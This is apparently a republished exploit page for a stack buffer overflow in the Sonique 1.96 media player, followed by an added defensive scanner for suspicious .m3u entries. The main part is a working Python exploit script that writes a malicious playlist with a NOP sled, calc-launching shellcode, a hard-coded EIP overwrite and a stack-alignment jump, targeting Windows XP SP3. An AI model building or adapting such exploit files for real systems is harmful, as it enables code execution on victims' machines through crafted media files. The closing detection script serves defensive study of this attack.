Sonique 1.96 .m3u Buffer Overflow
Source: vfocus.net  Author: Securityxxxpert  Published: 2011-05-18

#Application: Sonique BOF EIP Overwrite
#Version:  1.96
#Author: Securityxxxpert
#Date Submitted:  May 17, 2011
#Download Link: http://www.tucows.com/preview/193562
#Tested on:  Windows XP SP3
#EIP Overwritten: 239 Bytes
#Pita Bytes:  0x00 0x83 0x88 0x93
#Notes:  Not universal, find your own offsets if not SP3 Eng
#Notes Cont:  4 Nops is added before aligning the stack in order to align the stack properly without errors
#Humor: Waterbottle + Justin Bieber's Head = Pwnage
print "--------------------------------------------------------------------------------"
print "                                      Sonique Player Exploit                    "
print "                                      Retreat Hell!                             "
print "Greetz:  Acidgen, Subinacls, GrumpyBear, Pyoor, Corelanc0d3r, Dr. Nick, Rek0n   "
print "Greetz Cont: Connection, MaXe, ronin, Intern0t,                                  "
print "Greetz Cont:  Podjackel, g0tmi1k & The entire Corelan & Offensive Security Teams "
print "--------------------------------------------------------------------------------"
import os
filename = "waterbottle.m3u"

nopsled = "\x90" * 93  # Sliding to pwnage
sc = ("\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0")  # 16 byte Calc Shellcode
filler = "\x90" * 130
eip = '\x6F\x9C\x10\x5D'  # 0x5D109C6F
alignjmp = '\x83\xC3\x1c\x90' + '\xff\xe3'  # Aligns the stack to EBX+1c, then jumps to EBX *EBX+1C*
Junk = '\x42' * 10000

exploit = nopsled + sc + filler + eip + "\x90" * 4 + alignjmp + Junk
os.makedirs("./Justin.Beiber -My World")
os.chdir("./Justin.Beiber -My World")
textfile = open(filename, "wb")  # binary mode so no byte of the payload is translated
textfile.write(exploit)
textfile.close()
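As an added example for the defender side (not from the original post or the Sonique project), the Python 3 script below inspects an .m3u file for entries shaped like the payload above: an overlong entry, bytes that are not valid UTF-8, or a long run of one repeated byte. The length and run thresholds and the two sample playlists are constructed assumptions; the 239-byte figure in the header is the only value taken from the page.

```python
import re

# Thresholds are assumptions for this example. Real playlist entries are file
# paths or URLs, so anything approaching the 239-byte EIP offset quoted on the
# page is suspicious; the repeated-byte run length is chosen to catch padding.
MAX_ENTRY_LEN = 200
MIN_REPEAT_RUN = 16


def scan_m3u(data, max_len=MAX_ENTRY_LEN, min_run=MIN_REPEAT_RUN):
    """Return a list of (line_no, reason) findings for the raw bytes of one .m3u file."""
    findings = []
    run_re = re.compile(rb"(.)\1{%d,}" % (min_run - 1), re.DOTALL)
    for line_no, line in enumerate(data.split(b"\n"), 1):
        line = line.rstrip(b"\r")
        # Blank lines and #EXTM3U / #EXTINF directives are not media entries.
        if not line or line.startswith(b"#"):
            continue
        if len(line) > max_len:
            findings.append((line_no, "entry length %d exceeds %d" % (len(line), max_len)))
        try:
            text = line.decode("utf-8")
        except UnicodeDecodeError:
            findings.append((line_no, "entry is not valid UTF-8 (raw bytes in a path field)"))
        else:
            if any(ord(c) < 0x20 and c != "\t" for c in text):
                findings.append((line_no, "entry contains control characters"))
        m = run_re.search(line)
        if m:
            findings.append((line_no, "run of %d repeated 0x%s bytes"
                             % (len(m.group(0)), m.group(1).hex())))
    return findings


# Constructed samples: a normal playlist and one shaped like the padding above.
BENIGN_M3U = (b"#EXTM3U\n#EXTINF:213,Some Artist - Some Track\n"
              b"C:\\Music\\track01.mp3\nhttp://radio.example.invalid/stream.mp3\n")
SUSPECT_M3U = b"#EXTM3U\n" + b"\x90" * 93 + b"A" * 300 + b"\n"

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_M3U), ("suspect", SUSPECT_M3U)):
        print(name, scan_m3u(blob) or "no findings")
```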

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved